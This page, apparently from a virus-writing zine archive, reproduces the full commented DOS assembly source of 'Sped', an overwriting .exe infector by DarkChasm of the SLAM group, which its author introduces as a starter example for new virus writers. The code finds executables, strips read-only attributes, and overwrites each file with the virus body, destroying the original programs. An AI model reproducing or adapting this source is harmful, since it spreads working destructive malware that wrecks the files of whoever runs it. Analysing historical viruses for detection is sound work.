Copy Link
Add to Bookmark
Report
SLAM2.011: Sped Disassembly by DarkChasm [SLAM]
;
; Sped
; (C) DarkChasm [SLAM]
;
; ORIGIN: USA
; AUTHOR: DarkChasm
; GROUP : SLAM
; TYPE : Overwriting, exe infector, can infect Read-Only files (makes them
; archive only), error checking
;
; Ahh... My first virus. Don't be to hard on me. This should help some
; people who are just starting out. I tried to comment the source as good
; as possible.
;
; DarkChasm
Code Segment
assume cs:virus, ds:virus
org 100h
virus proc near
start:
mov ah,4Eh ; find first file function
xor cx,cx ; file with any attributes
lea dx, file_mask ; move offset of file_mask to ds:dx
dec byte ptr [file_mask] ; turn the + into a *
int 21h ; do it ; do it
inc byte ptr [file_mask] ; turn the * back into a +
jc exit ; if something goes wrong exit
clear_file_attributes:
mov ax, 4301h ; mov 43h to ah and 01h to al
mov cx, 20h ; make it an archive only file
mov dx, 9eh ; name of the file in DTA
int 21h ; do it
jmp open_file ; jump to open_file
find_next_file:
mov ah, 4Fh ; move 4Fh to ah (find next file)
int 21h ; do it
jc exit ; something go wrong? If so exit
call clear_file_attributes ; do clear_file_attributes
open_file:
mov ax, 3D02h ; move 3Dh to ah and 02h to al
mov dx, 9eh ; name of the file in DTA
int 21h ; do it
infect_file:
xchg bx, ax ; trade the contents of ax and bx
mov ah, 40h ; move 40h to ah
mov cx, offset vend - offset start ; put the size of virus in cx
lea dx, start ; put the offset of start in ds:dx
int 21h ; do it
close_file:
mov ah, 3Eh ; move 3Eh to ah
int 21h ; do it
jmp find_next_file ; jump to find_next_file
exit:
int 20h ; exit
file_mask db '+.exe',0
Virus_Signature db 'Sped (C) DarkChasm [SLAM]',0
vend label near
virus endp
code ends
end start